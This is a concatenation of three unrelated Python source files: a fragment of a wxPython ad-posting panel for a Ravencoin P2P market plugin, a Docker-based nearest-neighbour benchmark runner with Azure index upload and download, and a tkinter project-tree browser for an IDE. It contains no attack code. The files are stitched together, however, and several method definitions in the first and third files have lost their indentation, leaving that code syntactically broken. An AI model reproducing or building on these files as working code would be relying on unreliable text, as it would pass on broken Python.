        _toShow = self._MethodsPanelList[_type]
        if _toShow != None:
            _toShow.Show()
            self.logger.info(f"onswapchangedforce = {_adtype}")
            # Propagate the current ad type to the panel being shown.
            _toShow.OnSwapTypeChanged(evt=None ,forceId=_adtype)
        #w, h = _toShow.GetSize()
        #w = h
        #_toShow.SetSize(w, 150)
        #self.m_txMethodPanel.SetSize(w, 150)
        self.Layout()
        #panel.SetSize(w, h)
        #_toShow.SetSizerAndFit(self.TxMethodPanelSizer,deleteOld=False)
        #self.m_txMethodPanel.SetSizerAndFit(self.TxMethodPanelSizer,deleteOld=False)
        #self.m_txMethodPanel.SetSizerAndFit(self.TxMethodPanelSizer)
    # Disabled quantity/price handlers kept for reference.
    """
    def OnQuantityChanged(self, evt):
        self._newAdObject._adAssetQt = self.m_AdAssetQt.GetValue()
    def OnPriceChanged(self, evt):
        self._newAdObject._adPrice = self.m_AdAssetPrice.GetValue()
    """
def OnLinkChanged(self, evt):
self._newAdObject._adExternalLink = self.m_AdLink.GetValue()
def OnDescriptionChanged(self, evt):
self._newAdObject._adDescription = self.m_AdDescription.GetValue()
def OnKeywordChanged(self, evt):
self._newAdObject._adKeywords = self.m_AdKeyword.GetValue()
def __checkChannel__(self):
self._validChanel = False
try:
myPlugin = self.parent_frame.GetPlugin('P2PMarket')
ravencoin = myPlugin.__getNetwork__()
#balanceChanel = ravencoin.asset.GetBalance(self._newAdObject._adP2PChannelAsset)
self._validChanel = ravencoin.p2pmarket.CheckP2PAnnouncerAccount(self._newAdObject._adAddress, self._newAdObject._adP2PChannelAsset, setupIfNotReady=False , password="")
#if balanceChanel > 0.2:
# self._validChanel = True
except Exception as e:
self.parent_frame.Log("Unable to load Chanel '{self._newAdObject._adP2PChannelAsset}' balance" , type="warning")
if self._validChanel:
self.m_bitmap16.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('passed'))
else:
self.m_bitmap16.SetBitmap(self.parent_frame.RessourcesProvider.GetImage('warning_2'))
self.Layout()
return self._validChanel
def OnP2PChannelChanged(self, evt):
_str = self.m_AdP2PChannelChoice.GetString(self.m_AdP2PChannelChoice.GetCurrentSelection())
self._newAdObject._adP2PChannelAsset = _str
self.__checkChannel__()
    def __LoadMethodPanel__(self, panel, show=False):
        """Instantiate *panel* (a panel class) inside m_txMethodPanel, add it to
        the shared sizer and optionally show it right away.

        Returns the new panel instance.
        """
        if self.TxMethodPanelSizer == None:
            # Lazily create the sizer shared by all method panels.
            self.TxMethodPanelSizer = wx.BoxSizer( wx.VERTICAL )
        _newPanel = panel(self.m_txMethodPanel, self.parent_frame, isInternalPluginView=True, isInternalPanel=True, parentDataObj=self)
        self.TxMethodPanelSizer.Add( _newPanel, 1, wx.ALL|wx.EXPAND, 5 )
        if show:
            self.SwitchMethodPanel(False)
        self.m_txMethodPanel.SetSizerAndFit(self.TxMethodPanelSizer)
        self.Layout()
        return _newPanel
    def setupPanel(self):
        """Populate the P2P-channel choice with the user's non-admin assets and
        pre-select the plugin's default channel."""
        '''
        self._MethodsPanelListClasses = {0:wxRavenP2PMarket_NewAtomiSwapWithLogic,
                                  1:wxRavenP2PMarket_NewAtomiSwapWithLogic,
                                  2:wxRavenP2PMarket_NewAtomiSwapWithLogic}
        '''
        myPlugin = self.parent_frame.GetPlugin('P2PMarket')
        ravencoin = myPlugin.__getNetwork__()
        if not ravencoin.test_rpc_status():
            # Warn but continue; the choice list will simply stay empty.
            UserError(self.parent_frame, "You must have an active connexion !")
        #self.m_AdAssetChoice.Clear()
        self.m_AdP2PChannelChoice.Clear()
        '''
        _allAdmins= ravencoin.asset.GetAllMyAssets()
        '''
        _allNotAdmins= ravencoin.asset.GetAllMyAssets(_excludeAdmin=True)
        #self.logger.info(_allAdmins)
        defaultChannel = myPlugin.PLUGIN_SETTINGS['p2p_channel_asset_default']
        AnnouncerAddress = myPlugin.PLUGIN_SETTINGS['p2p_channel_asset_target_address']
        self._newAdObject._adAddress = AnnouncerAddress
        '''
        for key in _allAdmins:
            self.m_AdAssetChoice.Append(key)
        '''
        for key in _allNotAdmins:
            self.m_AdP2PChannelChoice.Append(key)
        # Pre-select the configured default channel when it is in the list.
        _dc = self.m_AdP2PChannelChoice.FindString(defaultChannel)
        if _dc != wx.NOT_FOUND:
            self.m_AdP2PChannelChoice.SetSelection(_dc)
def waitApplicationReady(self):
t=threading.Thread(target=self.__waitLoop_T__, args=(self.UpdateView,))
t.start()
def __waitLoop_T__(self,callback):
while not self.parent_frame._isReady:
time.sleep(2)
wx.CallAfter(callback, ())
    #Override the UpdateView method to define what happen when plugin call UpdateViews()
    def UpdateView(self, evt=None):
        """Refresh plugin-backed data, re-layout, and rebuild the channel choices."""
        self.UpdateDataFromPluginDatas()
        self.Layout()
        self.setupPanel()
    #Example to show how plugin data are retreived
    def UpdateDataFromPluginDatas(self):
        """Template hook: pull data from the plugin into the panel (currently a no-op)."""
        try:
            #myPluginData = self.parent_frame.GetPluginData("Tutorial","myPluginData2")
            #myPluginSetting = self.parent_frame.GetPluginSetting("Tutorial","booleansetting")#SavePanelSettings GetPluginSetting
            #
            #Update your panel
            #
            #textToPrint = " booleansetting = " + str(myPluginSetting)
            #textToPrint = textToPrint + "\n\n myPluginData2 = " + str(myPluginData)
            #self.m_staticText2.SetLabel(str(textToPrint))
            pass
        except Exception as e:
            self.parent_frame.Log("Unable to load p2p Market datas" , type="warning")
|
runner.py | import argparse
import json
import logging
import os
import threading
import time
import traceback
import colors
import docker
import numpy
import psutil
from benchmark.algorithms.definitions import (Definition,
instantiate_algorithm)
from benchmark.datasets import DATASETS, upload_accelerated, download_accelerated
from benchmark.results import store_results
from benchmark.sensors.power_capture import power_capture
from benchmark.t3.helper import t3_create_container
def run_individual_query(algo, X, distance, count, run_count, search_type):
    """Execute the query workload *run_count* times and keep the best wall-clock time.

    Returns (attrs, results): attrs describes the run (best time, algo name,
    distance, search type, k, run count) merged with algo.get_additional();
    results is whatever the algorithm reported for the final run.
    """
    best_search_time = float('inf')
    for attempt in range(run_count):
        print('Run %d/%d...' % (attempt + 1, run_count))
        started = time.time()
        if search_type == "knn":
            algo.query(X, count)
            elapsed = time.time() - started
            results = algo.get_results()
            # Every query must produce exactly one result entry.
            assert len(results) == len(X)
        else:
            algo.range_query(X, count)
            elapsed = time.time() - started
            results = algo.get_range_results()
        best_search_time = min(best_search_time, elapsed)
    attrs = {
        "best_search_time": best_search_time,
        "name": str(algo),
        "run_count": run_count,
        "distance": distance,
        "type": search_type,
        "count": int(count),
    }
    # Let the algorithm attach implementation-specific metrics.
    attrs.update(algo.get_additional())
    return (attrs, results)
def run(definition, dataset, count, run_count, rebuild,
        upload_index=False, download_index=False,
        blob_prefix="", sas_string=""):
    """Instantiate the algorithm from *definition* and benchmark it on *dataset*.

    Either downloads a prebuilt index, loads a local one, or builds it, then
    runs every query-argument group and stores the results. When upload_index
    is set the index is uploaded instead of queried. upload_index and
    download_index are mutually exclusive.
    """
    algo = instantiate_algorithm(definition)
    assert not definition.query_argument_groups \
           or hasattr(algo, "set_query_arguments"), """\
error: query argument groups have been specified for %s.%s(%s), but the \
algorithm instantiated from it does not implement the set_query_arguments \
function""" % (definition.module, definition.constructor, definition.arguments)
    assert not upload_index or not download_index
    ds = DATASETS[dataset]()
    #X_train = numpy.array(D['train'])
    X = ds.get_queries()
    distance = ds.distance()
    search_type = ds.search_type()
    print(f"Running {definition.algorithm} on {dataset}")
    print(fr"Got {len(X)} queries")
    try:
        # Try loading the index from the file
        memory_usage_before = algo.get_memory_usage()
        if download_index:
            # Fetch every index component from blob storage, then load it.
            local_dir, index_prefix, components = algo.index_files_to_store(dataset)
            remote_location = blob_prefix + '/' + algo.track() + '/' + algo.__str__() + '/' + DATASETS[dataset]().short_name() + '/'
            for component in components:
                download_accelerated(remote_location + index_prefix + component,
                                     local_dir + '/' + index_prefix + component,
                                     False, sas_string)
            print("Index files downloaded.")
            if algo.load_index(dataset):
                print("Index loaded.")
            else:
                print("Index load failed.")
        elif rebuild or not algo.load_index(dataset):
            # Build the index if it is not available
            t0 = time.time()
            algo.fit(dataset)
            build_time = time.time() - t0
            print('Built index in', build_time)
        else:
            print("Loaded existing index")
        index_size = algo.get_memory_usage() - memory_usage_before
        print('Index memory footprint: ', index_size)
        if upload_index:
            print("Starting index upload...")
            local_dir, index_prefix, components = algo.index_files_to_store(dataset)
            remote_location = blob_prefix + '/' + algo.track() + '/' + algo.__str__() + '/' + DATASETS[dataset]().short_name()
            for component in components:
                upload_accelerated(local_dir, remote_location,
                                   index_prefix + component, sas_string)
        else:
            print("Starting query")
            query_argument_groups = definition.query_argument_groups
            # Make sure that algorithms with no query argument groups still get run
            # once by providing them with a single, empty, harmless group
            if not query_argument_groups:
                query_argument_groups = [[]]
            for pos, query_arguments in enumerate(query_argument_groups, 1):
                print("Running query argument group %d of %d..." %
                      (pos, len(query_argument_groups)))
                if query_arguments:
                    algo.set_query_arguments(*query_arguments)
                descriptor, results = run_individual_query(
                    algo, X, distance, count, run_count, search_type)
                # A bit unclear how to set this correctly if we usually load from file
                #descriptor["build_time"] = build_time
                descriptor["index_size"] = index_size
                descriptor["algo"] = definition.algorithm
                descriptor["dataset"] = dataset
                if power_capture.enabled():
                    power_stats = power_capture.run(algo, X, distance, count,
                                                    run_count, search_type, descriptor)
                store_results(dataset, count, definition,
                              query_arguments, descriptor, results, search_type)
    finally:
        # Always give the algorithm a chance to release its resources.
        algo.done()
def run_from_cmdline(args=None):
    """Container/in-process entry point: parse an argument vector, build a
    Definition from it and run the benchmark.

    args -- list of CLI tokens; None means use sys.argv.
    """
    parser = argparse.ArgumentParser('''
NOTICE: You probably want to run.py rather than this script.
''')
    parser.add_argument(
        '--dataset',
        choices=DATASETS.keys(),
        help=f'Dataset to benchmark on.',
        required=True)
    parser.add_argument(
        '--algorithm',
        help='Name of algorithm for saving the results.',
        required=True)
    parser.add_argument(
        '--module',
        help='Python module containing algorithm. E.g. "ann_benchmarks.algorithms.annoy"',
        required=True)
    parser.add_argument(
        '--constructor',
        help='Constructer to load from module. E.g. "Annoy"',
        required=True)
    parser.add_argument(
        '--count',
        help='k: Number of nearest neighbours for the algorithm to return.',
        required=True,
        type=int)
    parser.add_argument(
        '--rebuild',
        help='re-build index even if it exists',
        action='store_true')
    parser.add_argument(
        '--runs',
        help='Number of times to run the algorihm. Will use the fastest run-time over the bunch.',
        required=True,
        type=int)
    parser.add_argument(
        'build',
        help='JSON of arguments to pass to the constructor. E.g. ["angular", 100]'
        )
    parser.add_argument(
        'queries',
        help='JSON of arguments to pass to the queries. E.g. [100]',
        nargs='*',
        default=[])
    parser.add_argument(
        '--power-capture',
        help='Power capture parameters for the T3 competition. '
             'Format is "ip:port:capture_time_in_seconds (ie, 127.0.0.1:3000:10).',
        default="")
    parser.add_argument(
        '--upload-index',
        help='Upload index to cloud storage.',
        action='store_true')
    parser.add_argument(
        '--download-index',
        help='Download index from cloud storage.',
        action='store_true')
    parser.add_argument(
        '--blob-prefix',
        help='Azure blob prefix to upload index to or download index from.')
    parser.add_argument(
        '--sas-string',
        help='SAS string to authenticate to Azure blob storage.')
    args = parser.parse_args(args)
    # Constructor arguments and per-group query arguments arrive as JSON strings.
    algo_args = json.loads(args.build)
    print(algo_args)
    query_args = [json.loads(q) for q in args.queries]
    if args.power_capture:
        # Configure the power-capture singleton and verify the sensor answers.
        power_capture( args.power_capture )
        power_capture.ping()
    definition = Definition(
        algorithm=args.algorithm,
        docker_tag=None, # not needed
        module=args.module,
        constructor=args.constructor,
        arguments=algo_args,
        query_argument_groups=query_args,
        disabled=False
    )
    run(definition, args.dataset, args.count, args.runs, args.rebuild,
        args.upload_index, args.download_index, args.blob_prefix, args.sas_string)
def run_docker(definition, dataset, count, runs, timeout, rebuild,
               cpu_limit, mem_limit=None, t3=None, power_capture=None,
               upload_index=False, download_index=False,
               blob_prefix="", sas_string=""):
    """Run one benchmark definition inside a Docker container.

    Builds the CLI vector for run_from_cmdline, starts the container with
    CPU/memory limits, streams its logs, waits for completion (bounded by
    *timeout*), and always removes the container afterwards. For the T3 track
    a special container is created and the timeout is raised to 3 days.
    """
    cmd = ['--dataset', dataset,
           '--algorithm', definition.algorithm,
           '--module', definition.module,
           '--constructor', definition.constructor,
           '--runs', str(runs),
           '--count', str(count)]
    if power_capture:
        cmd += ["--power-capture", power_capture ]
    if rebuild:
        cmd.append("--rebuild")
    if upload_index:
        cmd.append("--upload-index")
        cmd += ["--blob-prefix", blob_prefix]
        cmd += ["--sas-string", sas_string]
    if download_index:
        cmd.append("--download-index")
        cmd += ["--blob-prefix", blob_prefix]
        cmd += ["--sas-string", sas_string]
    # Positional args: constructor arguments, then one JSON per query group.
    cmd.append(json.dumps(definition.arguments))
    cmd += [json.dumps(qag) for qag in definition.query_argument_groups]
    client = docker.from_env()
    if mem_limit is None:
        mem_limit = psutil.virtual_memory().available
    container = None
    if t3:
        container = t3_create_container(definition, cmd, cpu_limit, mem_limit )
        timeout = 3600*24*3 # 3 days
        print("Setting container wait timeout to 3 days")
    else:
        container = client.containers.run(
            definition.docker_tag,
            cmd,
            volumes={
                os.path.abspath('benchmark'):
                    {'bind': '/home/app/benchmark', 'mode': 'ro'},
                os.path.abspath('data'):
                    {'bind': '/home/app/data', 'mode': 'rw'},
                os.path.abspath('results'):
                    {'bind': '/home/app/results', 'mode': 'rw'},
            },
            cpuset_cpus=cpu_limit,
            mem_limit=mem_limit,
            detach=True)
    logger = logging.getLogger(f"annb.{container.short_id}")
    logger.info('Created container %s: CPU limit %s, mem limit %s, timeout %d, command %s' % \
                (container.short_id, cpu_limit, mem_limit, timeout, cmd))
    def stream_logs():
        # Forward container output into our logger as it is produced.
        for line in container.logs(stream=True):
            logger.info(colors.color(line.decode().rstrip(), fg='blue'))
    t = threading.Thread(target=stream_logs, daemon=True)
    t.start()
    try:
        # NOTE(review): on recent docker-py, container.wait() returns a dict
        # like {'StatusCode': N}, so this membership test may never match the
        # integer 0 — confirm against the installed docker-py version.
        exit_code = container.wait(timeout=timeout)
        # Exit if exit code
        if exit_code not in [0, None]:
            logger.error(colors.color(container.logs().decode(), fg='red'))
            logger.error('Child process for container %s raised exception %d' % (container.short_id, exit_code))
    except:
        logger.error('Container.wait for container %s failed with exception' % container.short_id)
        logger.error('Invoked with %s' % cmd)
        traceback.print_exc()
    finally:
        container.remove(force=True)
def run_no_docker(definition, dataset, count, runs, timeout, rebuild,
                  cpu_limit, mem_limit=None, t3=False, power_capture=None,
                  upload_index=False, download_index=False,
                  blob_prefix="", sas_string=""):
    """Run the benchmark in the current process instead of a container.

    Builds the same CLI argument vector run_docker would hand to the container
    entry point and feeds it straight to run_from_cmdline. timeout, cpu_limit,
    mem_limit and t3 are accepted for signature compatibility but unused here.
    """
    args = ['--dataset', dataset,
            '--algorithm', definition.algorithm,
            '--module', definition.module,
            '--constructor', definition.constructor,
            '--runs', str(runs),
            '--count', str(count)]
    if power_capture:
        args.extend(["--power-capture", power_capture])
    if rebuild:
        args.append("--rebuild")
    # Upload first, then download, to match the flag order run_docker emits.
    for enabled, flag in ((upload_index, "--upload-index"),
                          (download_index, "--download-index")):
        if enabled:
            args.append(flag)
            args.extend(["--blob-prefix", blob_prefix])
            args.extend(["--sas-string", sas_string])
    # Positional args: constructor arguments, then one JSON per query group.
    args.append(json.dumps(definition.arguments))
    args.extend(json.dumps(group) for group in definition.query_argument_groups)
    run_from_cmdline(args)
|
basebrowser.py | # -*- coding: utf-8 -*-
from noval import GetApp,_,core,constants
import os
import tkinter as tk
from tkinter import messagebox,filedialog
import noval.consts as consts
from tkinter import ttk
import noval.util.utils as utils
import noval.util.fileutils as fileutils
import noval.util.strutils as strutils
import noval.project.baseviewer as baseviewer
import noval.imageutils as imageutils
import noval.menu as tkmenu
import noval.misc as misc
import threading
from noval.project.command import ProjectAddProgressFilesCommand
from noval.python.parser.utils import py_cmp,py_sorted
import noval.terminal as terminal
import noval.project.property as projectproperty
import time
import noval.project.document as projectdocument
import noval.ui_utils as ui_utils
import noval.syntax.syntax as syntax
import noval.project.command as projectcommand
import noval.project.openwith as openwith
class EntryPopup(tk.Entry):
    """In-place edit box overlaid on a tree item during label editing."""
    def __init__(self, parent, text, item,**kw):
        """parent: the owning tree widget; text: initial label; item: tree item id."""
        tk.Entry.__init__(self,parent, **kw)
        self.item = item
        self.insert(0, text)
        # White background even when read-only, blue selection colour, and keep
        # the selection visible when focus moves elsewhere.
        self.configure(readonlybackground='white',
                       selectbackground='#1BA1E2',
                       exportselection=False)
        self.focus_force()
        self.bind("<Control-a>", self.selectAll)
        self.bind("<Escape>", lambda *ignore: self.destroy())
        # Commit the edit through the owning tree on Enter.
        self.bind("<Return>",self.master.FinishLabel)
        self.selectAll()
    def selectAll(self, *ignore):
        """Select the whole text; returning 'break' stops default key bindings."""
        self.selection_range(0, 'end')
        return 'break'
class ProjectTreeCtrl(ttk.Treeview):
    """Tree control showing the files and folders of a project.

    File items store the project file path in their values tuple; folder items
    carry no value (GetPyData returns None for them).
    """
    # Tags used to render the project startup file in bold / normal font.
    BOLD_TAG = 'BoldItem'
    NORMAL_TAG = 'NormalItem'
    #----------------------------------------------------------------------------
    # Overridden Methods
    #----------------------------------------------------------------------------
    def __init__(self, master, **kw):
        ttk.Treeview.__init__(self, master, **kw)
        # Cache of document template -> icon, filled lazily by BuildLookupIcon.
        self._iconLookup = {}
        self._blankIconImage = imageutils.getBlankIcon()
        self._packageFolderImage = imageutils.getPackageFolderIcon()
        self._folderClosedImage = imageutils.getFolderClosedIcon()
        # In-place label editing state.
        self.is_edit_state = False
        self.entryPopup = None
        self.bind("<Escape>", self.EndLabel)
        self.bind("<Button-1>", self.FinishLabel)
    def SelectItem(self,node):
        """Select *node* and give it keyboard focus."""
        self.selection_set(node)
        self.focus(node)
    def BuildLookupIcon(self):
        """Populate the template/icon cache on first use."""
        if 0 == len(self._iconLookup):
            self.RebuildLookupIcon()
    def RebuildLookupIcon(self):
        """(Re)load the icon of every registered document template."""
        templates = GetApp().GetDocumentManager().GetTemplates()
        for template in templates:
            icon = template.GetIcon()
            self._iconLookup[template] = icon
    def SetItemBold(self,node,bold=True):
        """Render *node* in bold (used to mark the project startup file)."""
        if bold:
            self.item(node, tags=(self.BOLD_TAG))
            self.tag_configure(self.BOLD_TAG, font=consts.TREE_VIEW_BOLD_FONT)
        else:
            self.item(node, tags=(self.NORMAL_TAG))
            self.tag_configure(self.NORMAL_TAG, font=consts.TREE_VIEW_FONT)
    def GetPyData(self,node):
        """Return the file path stored on *node*, or None for folders/None."""
        if node is None:
            return None
        values = self.item(node)["values"]
        # Items without values (folders) come back as an empty string.
        if type(values) == str:
            return None
        return values[0]
    def SortChildren(self,node):
        """Sort the direct children of *node*: folders first, then by name."""
        children = self.get_children(node)
        ids_sorted_by_name = py_sorted(children, cmp_func=self.OnCompareItems)
        self.set_children(node, *ids_sorted_by_name)
    def GetChildrenCount(self,item):
        """Return the number of direct children of *item*."""
        return len(self.get_children(item))
    def DeleteChildren(self,node):
        """Remove every child of *node*."""
        for child_id in self.get_children(node):
            self.delete(child_id)
    def GetRootItem(self):
        """Return the (single) root item, or None when the tree is empty."""
        return self.GetFirstChild(None)
    def GetFirstChild(self,item):
        """Return the first child of *item*, or None when it has none."""
        childs = self.get_children(item)
        if 0 == len(childs):
            return None
        return childs[0]
    def EndLabel(self,event):
        """Abort in-place label editing without applying the new text."""
        if not self.is_edit_state or self.entryPopup is None:
            return
        self.entryPopup.destroy()
        self.entryPopup = None
        self.is_edit_state = False
    def FinishLabel(self,event):
        """Commit in-place label editing, notifying the owning view."""
        if not self.is_edit_state or self.entryPopup is None:
            return
        self.master.GetView().OnEndLabelEdit(self.entryPopup.item,self.entryPopup.get())
        self.EndLabel(event)
    def EditLabel(self,item):
        """Start in-place editing of *item*'s label with an overlay Entry."""
        self.is_edit_state = True
        item_box = self.bbox(item)
        if not item_box:
            # Item not visible yet; scroll it into view and bail out.
            self.see(item)
            return
        x,y,width,height = item_box
        # y-axis offset
        pady = height // 2
        # place Entry popup properly
        text = self.item(item, 'text')
        self.entryPopup = EntryPopup(self,text,item)
        self.entryPopup.place( x=30, y=y+pady, anchor=tk.W, relwidth=1)
    def OnCompareItems(self, item1, item2):
        """cmp-style comparator: folders before files, case-insensitive names."""
        item1IsFolder = (self.GetPyData(item1) == None)
        item2IsFolder = (self.GetPyData(item2) == None)
        if (item1IsFolder == item2IsFolder): # if both are folders or both not
            return py_cmp(self.item(item1,"text").lower(), self.item(item2,"text").lower())
        elif item1IsFolder and not item2IsFolder: # folders sort above non-folders
            return -1
        elif not item1IsFolder and item2IsFolder: # folders sort above non-folders
            return 1
    def AppendFolder(self, parent, folderName):
        """Append a folder node named *folderName* under *parent*."""
        item = self.insert(parent, "end", text=folderName, image=self._folderClosedImage)
        return item
    def GetIconFromName(self,filename):
        """Return the icon of the template matching *filename*.

        BUG FIX: the original called wx.GetApp() although this module is
        tkinter-based and never imports wx, raising NameError at runtime.
        """
        template = GetApp().GetDocumentManager().FindTemplateForPath(filename)
        return self.GetTemplateIcon(template)
    def GetProjectIcon(self):
        """Return the icon used for project files."""
        template = GetApp().GetDocumentManager().FindTemplateForTestPath(consts.PROJECT_EXTENSION)
        project_file_image = self.GetTemplateIcon(template)
        return project_file_image
    def GetTemplateIcon(self,template):
        """Return the cached icon for *template*, or a blank icon when unknown."""
        self.BuildLookupIcon()
        if template in self._iconLookup:
            return self._iconLookup[template]
        return self._blankIconImage
    def AppendItem(self, parent, filename, file):
        """Append a file node for *file* under *parent*; returns the item id.

        Dummy placeholder nodes are skipped (returns None).
        """
        if filename == consts.DUMMY_NODE_TEXT:
            return None
        # Prefer an explicit "open with" template configured for this file...
        template = GetApp().MainFrame.GetView(consts.PROJECT_VIEW_NAME).GetView().GetOpenDocumentTemplate(file)
        found = False
        # ...falling back to the default template for the file extension.
        if template is None:
            template = GetApp().GetDocumentManager().FindTemplateForPath(filename)
        file_image = self.GetTemplateIcon(template)
        # values must be a tuple, not a str, or the stored data gets corrupted.
        item = self.insert(parent, "end", text=filename, image=file_image,values=(file.filePath,))
        return item
    def AddFolder(self, folderPath):
        """Create (or reuse) the folder chain for slash-separated *folderPath*.

        Returns the list of folder items that were newly created.
        """
        folderItems = []
        if folderPath != None:
            folderTree = folderPath.split('/')
            item = self.GetRootItem()
            for folderName in folderTree:
                found = False
                for child in self.get_children(item):
                    file = self.GetPyData(child)
                    if file:
                        pass
                    else: # folder
                        if self.item(child, "text") == folderName:
                            item = child
                            found = True
                            break
                if not found:
                    item = self.AppendFolder(item, folderName)
                    folderItems.append(item)
        return folderItems
    def FindItem(self, filePath, parentItem=None):
        """Depth-first search for the item whose stored path equals *filePath*."""
        if not parentItem:
            parentItem = self.GetRootItem()
        for child in self.get_children(parentItem):
            child_file_path = self.GetPyData(child)
            if child_file_path:
                if child_file_path == filePath:
                    return child
            else: # folder
                result = self.FindItem(filePath, child) # do recursive call
                if result:
                    return result
        return None
    def FindFolder(self, folderPath):
        """Return the folder item matching slash-separated *folderPath*, else None."""
        if folderPath != None:
            folderTree = folderPath.split('/')
            item = self.GetRootItem()
            for folderName in folderTree:
                found = False
                for child in self.get_children(item):
                    file = self.GetPyData(child)
                    if file:
                        pass
                    else: # folder
                        if self.item(child, "text") == folderName:
                            item = child
                            found = True
                            break
            if found:
                return item
        return None
    def FindClosestFolder(self, x, y):
        """Return the folder item at/above the given coordinates.

        NOTE(review): HitTest/GetItemParent are wx.TreeCtrl APIs that do not
        exist on ttk.Treeview; this looks like a dead wx leftover and would
        raise AttributeError if called — confirm before relying on it.
        """
        item, flags = self.HitTest((x,y))
        if item:
            file = self.GetPyData(item)
            if file:
                item = self.GetItemParent(item)
                return item
            return item
        return None
    def GetSingleSelectItem(self):
        """Return the first selected item, or None when nothing is selected."""
        items = self.selection()
        if not items:
            return None
        return items[0]
class BaseProjectbrowser(ttk.Frame):
    """Project browser panel: a project selector combobox above a project file tree."""
    def __init__(
        self,
        master,
        columns=["#0", "kind", "path"],
        displaycolumns="#all",
        show_scrollbar=True,
        borderwidth=0,
        relief="flat",
        **tree_kw
    ):
        ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
        # Mapping of documents to their owning project.
        self._mapToProject = dict()
        # Bind the ShowView event; the saved project history list is loaded there.
        GetApp().bind("ShowView", self.Show, True)
        # http://wiki.tcl.tk/44444#pagetoc50f90d9a
        self.vert_scrollbar = ttk.Scrollbar(
            self, orient=tk.VERTICAL, style=None
        )
        if show_scrollbar:
            self.vert_scrollbar.grid(row=1, column=1, sticky=tk.NSEW)
        self.project_combox = ttk.Combobox(self)
        self.project_combox.bind("<<ComboboxSelected>>",self.ProjectSelect)
        self.project_combox.grid(row=0, column=0, sticky=tk.NSEW)
        # Make the combobox read-only (not editable).
        self.project_combox.state(['readonly'])
        self.tree = self.GetProjectTreectrl(**tree_kw)
        # The widget shows headings by default; hide them here.
        self.tree.column("#0", anchor=tk.W, stretch=True)
        self.tree["show"] = ("tree",)
        self.tree.grid(row=1, column=0, sticky=tk.NSEW)
        self.vert_scrollbar["command"] = self.tree.yview
        self.columnconfigure(0, weight=1)
        self.rowconfigure(1, weight=1)
        # Double-click on the tree opens the selected item.
        self.tree.bind("<Double-Button-1>", self.on_double_click, "+")
        self.tree.bind("<Return>",self.OnEnter)
        # Remember/persist child expansion state when a node is expanded.
        self.tree.bind("<<TreeviewOpen>>", self.OpenTreeItem)
        # Set while the stored history project list is being loaded at startup.
        self._is_loading = False
        # Create the project view; all projects share one view. Must be created
        # at the very end of the constructor.
        view = self.CreateView()
        self.SetView(view)
        self.GetView().AddProjectRoot(_("Projects"))
        GetApp().bind("InitTkDnd",self.SetDropTarget,True)
        self.tree.bind("<3>", self.on_secondary_click, True)
        self.tree.bind("<<TreeviewSelect>>", self._on_select, True)
        # Default file-extension filters used when refreshing project folders.
        self.filters = utils.profile_get("DEFAULT_FILE_FILTERS",syntax.SyntaxThemeManager().GetLexer(GetApp().GetDefaultLangId()).Exts)
def SetDropTarget(self,event):
#项目视图允许拖拽添加文件
if GetApp().dnd is not None and utils.profile_get_int('ALLOW_DROP_OPENFILE',True):
GetApp().dnd.bindtarget(self, baseviewer.ProjectFileDropTarget(self.GetView()), 'text/uri-list')
def GetProjectTreectrl(self,**tree_kw):
return ProjectTreeCtrl(self,
yscrollcommand=self.vert_scrollbar.set,**tree_kw)
def _on_select(self,event):
#选中项目节点时设置项目视图为活跃视图
GetApp().GetDocumentManager().ActivateView(self.GetView())
def _clear_tree(self):
for child_id in self.tree.get_children():
self.tree.delete(child_id)
def clear(self):
self._clear_tree()
def GetItemFile(self, item):
file_path = self.GetView()._GetItemFilePath(item)
if not file_path:
return None
return self.GetView().GetDocument().GetModel().FindFile(file_path)
def OnEnter(self,event):
if self.tree.is_edit_state:
self.tree.FinishLabel(event)
return
self.OpenSelection()
def on_double_click(self, event):
self.OpenSelection()
def OpenSelection(self):
    """Open the currently selected project item with its configured template.

    If the file no longer exists on disk the user may browse for its new
    location and the project model is updated accordingly.  Project files
    that are already open are re-activated instead of re-opened.
    """
    selections = self.tree.selection()
    if not selections:
        return
    doc = None
    try:
        item = selections[0]
        filepath = self.GetView()._GetItemFilePath(item)
        # template describing how this project file should be opened
        file_template = None
        if filepath:
            # normalize the file path
            filepath = fileutils.opj(filepath)
            if not os.path.exists(filepath):
                msgTitle = GetApp().GetAppName()
                if not msgTitle:
                    msgTitle = _("File Not Found")
                ret = messagebox.askyesno(msgTitle,_("The file '%s' was not found in '%s'.\n\nWould you like to browse for the file?") \
                                          % (fileutils.get_filename_from_path(filepath), fileutils.get_filepath_from_path(filepath)),parent=self)
                # user answered "no"
                if not ret:
                    return
                newpath = filedialog.askopenfilename(
                    master=self,
                    ### filetypes=descrs,
                    initialdir=os.getcwd(),
                    title = _("Choose a file"),
                    initialfile = fileutils.get_filename_from_path(filepath)
                )
                if newpath:
                    # update Project Model with new location
                    self.GetView().GetDocument().UpdateFilePath(filepath, newpath)
                    filepath = newpath
                else:
                    # user pressed the cancel button
                    return
            else:
                project_file = self.GetItemFile(item)
                # look up the open-with template configured for this project file
                file_template = self.GetView().GetOpenDocumentTemplate(project_file)
            # if an open-with template exists, use it to open the file
            if file_template:
                doc = GetApp().GetDocumentManager().CreateTemplateDocument(file_template,filepath, core.DOC_SILENT|core.DOC_OPEN_ONCE)
                docs = [doc]
            # otherwise open with the default template for the extension
            else:
                docs = GetApp().GetDocumentManager().CreateDocument(filepath, core.DOC_SILENT|core.DOC_OPEN_ONCE)
            if not docs and filepath.endswith(consts.PROJECT_EXTENSION):  # project already open
                self.SetProject(filepath)
            elif docs:
                baseviewer.AddProjectMapping(docs[0])
                # check whether a file-extension plugin applies to this file
                ui_utils.CheckFileExtension(filepath,False)
    except IOError as e:
        msgTitle = GetApp().GetAppName()
        if not msgTitle:
            msgTitle = _("File Error")
        # BUG FIX: the original handler used wx APIs (wx.GetApp, wx.MessageBox,
        # wx.lib.docview, self.GetFrame) which do not exist in this tkinter
        # application and would raise NameError; report via messagebox instead.
        messagebox.showerror(msgTitle,
                             "Could not open '%s'." % fileutils.get_filename_from_path(filepath),
                             parent=self)
def OpenSelectionWith(self):
    '''
    Let the user pick an "open with" editor/template for the selected project file.

    If the file is already open it must be closed first; the chosen template is
    then persisted (per path, per file name, or per extension) and matching tree
    item icons are updated.
    '''
    item = self.tree.selection()[0]
    item_file = self.GetItemFile(item)
    selected_file_path = item_file.filePath
    dlg = openwith.EditorSelectionDlg(GetApp().GetTopWindow(),item_file,self.GetView().GetDocument())
    if dlg.ShowModal() == constants.ID_OK:
        found_doc = GetApp().GetDocumentManager().GetDocument(selected_file_path)
        if found_doc:
